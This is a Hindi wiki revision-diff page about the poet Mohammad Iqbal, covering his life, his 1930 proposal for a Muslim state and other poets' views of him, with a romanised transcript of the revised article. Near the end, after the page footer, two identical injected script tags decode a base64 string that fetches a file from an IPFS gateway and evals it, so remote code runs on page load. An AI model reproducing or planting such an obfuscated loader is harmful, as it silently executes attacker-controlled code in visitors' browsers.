Difference between revisions of "मोहम्मद इक़बाल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''मोहम्मद इक़बाल''' एक आधुनिक भारतीय प्रसिद्ध [[मुसलमान]] कवि थे। इनका जन्म ब्रिटिश [[भारत]] के '[[सियालकोट]]', ([[पाकिस्तान]]) में 9 नवम्बर, 1877 को हुआ तथा इनकी मृत्यु 21 अप्रैल, 1938 ई. को हुई थी। इनके द्वारा लिखी गईं रचनाएँ मुख्य रूप से [[फ़ारसी भाषा|फ़ारसी]] में हैं। इनकी [[अंग्रेज़ी भाषा|अंग्रेज़ी]] में केवल एक पुस्तक है, जिसका शीर्षक है, 'सिक्स लेक्चर्स ऑन दि रिकन्सट्रक्शन ऑफ़ रिलीजस थॉट (धार्मिक चिन्तन की नवव्याख्या के सम्बन्ध में छह व्याख्यान)' है। मोहम्मद इक़बाल का मत था कि [[इस्लाम धर्म]] रूहानी आज़ादी की जद्दोजहद के जज़्बे का अलमबरदार है, और सभी प्रकार के धार्मिक अनुभवों का निचोड़ है। वह कर्मवीरता का एक जीवन्त सिद्धान्त है, जो जीवन को उद्देश्यपूर्ण बनाता है।
+
'''मोहम्मद इक़बाल''' एक आधुनिक भारतीय प्रसिद्ध [[मुसलमान]] कवि थे। इनका जन्म ब्रिटिश [[भारत]] के '[[सियालकोट]]', ([[पाकिस्तान]]) में 9 नवम्बर, 1877 को हुआ तथा इनकी मृत्यु 21 अप्रैल, 1938 ई. को हुई थी। इक़बाल ने अपनी अधिकांश रचनाएँ [[फ़ारसी भाषा|फ़ारसी]] में की हैं। "सारे जहाँ से अच्छा हिन्दोस्तां हमारा" यह मशहूर गीत इक़बाल का ही लिखा हुआ है। मोहम्मद इक़बाल का मत था कि [[इस्लाम धर्म]] रूहानी आज़ादी की जद्दोजहद के जज़्बे का अलमबरदार है, और सभी प्रकार के धार्मिक अनुभवों का निचोड़ है। वह कर्मवीरता का एक जीवन्त सिद्धान्त है, जो जीवन को उद्देश्यपूर्ण बनाता है।
 
==दूरदर्शी व्यक्तित्व==
 
==दूरदर्शी व्यक्तित्व==
 
इक़बाल ब्रिटेन और जर्मनी में पढ़ने के बाद हिन्दुस्तानी सरज़मीं पर लौटे आये थे। आज के दौर में पूरे मुल्क में भ्रष्टाचार और दूसरी मुश्किलात को लेकर जो आवामी जंग छिड़ी हुई है, उसका अंदेशा इक़बाल ने पहले ही लगा लिया था और लिखा था-
 
इक़बाल ब्रिटेन और जर्मनी में पढ़ने के बाद हिन्दुस्तानी सरज़मीं पर लौटे आये थे। आज के दौर में पूरे मुल्क में भ्रष्टाचार और दूसरी मुश्किलात को लेकर जो आवामी जंग छिड़ी हुई है, उसका अंदेशा इक़बाल ने पहले ही लगा लिया था और लिखा था-
Line 10: Line 10:
 
==शायरों के विचार==
 
==शायरों के विचार==
 
मशहूर शायर 'मनुव्वर राना' का कहना है कि इक़बाल के जेहन में हमेशा वह हिन्दुस्तान था, जो किसी सरहद में नहीं बँटा था। वह कहते हैं कि ‘जिस तरह [[भगत सिंह]] के हिन्दुस्तान में पूरा हिन्दुस्तान शामिल था, उसी तरह इक़बाल के हिन्दुस्तान में भी पूरा हिन्दुस्तान शामिल था।’ दूसरी ओर अन्य मशहूर शायर 'निदा फ़ाजली' कहते हैं कि इक़बाल बाद में पाकिस्तान के ही हिमायती बनकर रह गये थे। इक़बाल की क़ब्र पर अपने संस्मरण की याद करते हुए वह कहते हैं कि आज पाकिस्तान में इक़बाल को पूजा जाने लगा है और लोग उनकी क़ब्र पर आकर दुआएँ मांगने लगे हैं। वह शायर कम और पीर ज़्यादा बन गये हैं। ऐसा क्या हुआ कि जहाँ एक ओर उन्होंने लिखा ‘सारे जहाँ से अच्छा हिन्दोस्तां हमारा’ तो वहीं दूसरी ओर एक अलग मुस्लिम राज्य बनाने का विचार भी उन्होंने ही रखा। वहाँ उनका लिखा ‘लब पे आती है दुआ बनके तमन्ना मेरी’, कौमी तराना बन गया।
 
मशहूर शायर 'मनुव्वर राना' का कहना है कि इक़बाल के जेहन में हमेशा वह हिन्दुस्तान था, जो किसी सरहद में नहीं बँटा था। वह कहते हैं कि ‘जिस तरह [[भगत सिंह]] के हिन्दुस्तान में पूरा हिन्दुस्तान शामिल था, उसी तरह इक़बाल के हिन्दुस्तान में भी पूरा हिन्दुस्तान शामिल था।’ दूसरी ओर अन्य मशहूर शायर 'निदा फ़ाजली' कहते हैं कि इक़बाल बाद में पाकिस्तान के ही हिमायती बनकर रह गये थे। इक़बाल की क़ब्र पर अपने संस्मरण की याद करते हुए वह कहते हैं कि आज पाकिस्तान में इक़बाल को पूजा जाने लगा है और लोग उनकी क़ब्र पर आकर दुआएँ मांगने लगे हैं। वह शायर कम और पीर ज़्यादा बन गये हैं। ऐसा क्या हुआ कि जहाँ एक ओर उन्होंने लिखा ‘सारे जहाँ से अच्छा हिन्दोस्तां हमारा’ तो वहीं दूसरी ओर एक अलग मुस्लिम राज्य बनाने का विचार भी उन्होंने ही रखा। वहाँ उनका लिखा ‘लब पे आती है दुआ बनके तमन्ना मेरी’, कौमी तराना बन गया।
 
+
==रचनाएँ==
*[[मुरादाबाद]] के शायर मंसूर उस्मानी कहते हैं कि यह बदकिस्मती है कि इक़बाल को सिर्फ़ [[मुसलमान]] शायर की तरह देखा गया। वह कहते हैं कि इक़बाल सिर्फ़ इंसानियत के तरफदार थे ना कि किसी एक मुल्क या मजहब के। इक़बाल ने 1909 ई. में ‘शिकवा’ की रचना की, जिसमें उन्होंने मुसलमानों के ख़राब आर्थिक हालात की ख़ुदा से शिकायत की है।
+
[[मुरादाबाद]] के शायर मंसूर उस्मानी कहते हैं कि यह बदकिस्मती है कि इक़बाल को सिर्फ़ [[मुसलमान]] शायर की तरह देखा गया। वह कहते हैं कि इक़बाल सिर्फ़ इंसानियत के तरफ़दार थे ना कि किसी एक मुल्क या मज़हब के। इक़बाल ने 1909 ई. में ‘शिकवा’ की रचना की, जिसमें उन्होंने मुसलमानों के ख़राब आर्थिक हालात की ख़ुदा से शिकायत की है। इनके द्वारा लिखी गईं रचनाएँ मुख्य रूप से [[फ़ारसी भाषा|फ़ारसी]] में हैं। इनकी [[अंग्रेज़ी भाषा|अंग्रेज़ी]] में केवल एक पुस्तक है, जिसका शीर्षक है, 'सिक्स लेक्चर्स ऑन दि रिकन्सट्रक्शन ऑफ़ रिलीजस थॉट (धार्मिक चिन्तन की नवव्याख्या के सम्बन्ध में छह व्याख्यान)' है।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 06:13, 9 November 2011

mohammad iqabal ek adhunik bharatiy prasiddh musalaman kavi the. inaka janm british bharat ke 'siyalakot', (pakistan) mean 9 navambar, 1877 ko hua tatha inaki mrityu 21 aprail, 1938 ee. ko huee thi. iqabal ne apani adhikaansh rachanaean farasi mean ki haian. "sare jahaan se achchha hindostaan hamara" yah mashahoor git iqabal ka hi likha hua hai. mohammad iqabal ka mat tha ki islam dharm roohani azadi ki jaddojahad ke jazbe ka alamabaradar hai, aur sabhi prakar ke dharmik anubhavoan ka nicho d hai. vah karmavirata ka ek jivant siddhant hai, jo jivan ko uddeshyapoorn banata hai.

dooradarshi vyaktitv

iqabal briten aur jarmani mean padhane ke bad hindustani sarazamian par laute aye the. aj ke daur mean poore mulk mean bhrashtachar aur doosari mushkilat ko lekar jo avami jang chhi di huee hai, usaka aandesha iqabal ne pahale hi laga liya tha aur likha tha-

"vatan ki fikr kar nadaan, musibat ane vali hai
teri barabadiyoan ke charche haian asamanoan mean,
na sanbhaloge to mit jaoge e hiandostaan valoan
tumhari dastaan bhi n hogi dastanoan mean."

muslim rajy ka vichar

yoorop dhan aur satta ke lie pagal hai. islam hi ekamatr dharm hai, jo sachche jivan moolyoan ka nirman kar sakata hai aur anavarat sangharsh ke dvara prakriti ke oopar manushy ko vijayi bana sakata hai. unaki rachanaoan ne bharat ke musalaman yuvakoan mean yah bhavana bhar di ki, unaki ek prithak bhoomika hai. iqabal ne hi sabase pahale 1930 ee. mean bharat ke siandh ke bhitar uttar-pashchim simaprant, baloochistan, siandh tatha kashmir ko milakar ek naya muslim rajy banane ka vichar rakha, jisane pakistan ko janm diya. pakistan shabd iqabal ka gadha hua nahian hai. ise 1933 ee. mean chaudhari rahamat ali ne gadha tha. iqabal ki kavy pratibha se prabhavit hokar british sarakar ne inhean 'sar' ki upadhi pradan ki.

shayaroan ke vichar

mashahoor shayar 'manuvvar rana' ka kahana hai ki iqabal ke jehan mean hamesha vah hindustan tha, jo kisi sarahad mean nahian banta tha. vah kahate haian ki ‘jis tarah bhagat sianh ke hindustan mean poora hindustan shamil tha, usi tarah iqabal ke hindustan mean bhi poora hindustan shamil tha.’ doosari or any mashahoor shayar 'nida fajali' kahate haian ki iqabal bad mean pakistan ke hi himayati banakar rah gaye the. iqabal ki qabr par apane sansmaran ki yad karate hue vah kahate haian ki aj pakistan mean iqabal ko pooja jane laga hai aur log unaki qabr par akar duaean maangane lage haian. vah shayar kam aur pir zyada ban gaye haian. aisa kya hua ki jahaan ek or unhoanne likha ‘sare jahaan se achchha hindostaan hamara’ to vahian doosari or ek alag muslim rajy banane ka vichar bhi unhoanne hi rakha. vahaan unaka likha ‘lab pe ati hai dua banake tamanna meri’, kaumi tarana ban gaya.

rachanaean

muradabad ke shayar mansoor usmani kahate haian ki yah badakismati hai ki iqabal ko sirf musalaman shayar ki tarah dekha gaya. vah kahate haian ki iqabal sirf iansaniyat ke tarafadar the na ki kisi ek mulk ya mazahab ke. iqabal ne 1909 ee. mean ‘shikava’ ki rachana ki, jisamean unhoanne musalamanoan ke kharab arthik halat ki khuda se shikayat ki hai. inake dvara likhi geean rachanaean mukhy roop se farasi mean haian. inaki aangrezi mean keval ek pustak hai, jisaka shirshak hai, 'siks lekchars aaun di rikansatrakshan aauf rilijas th aaut (dharmik chintan ki navavyakhya ke sambandh mean chhah vyakhyan)' hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh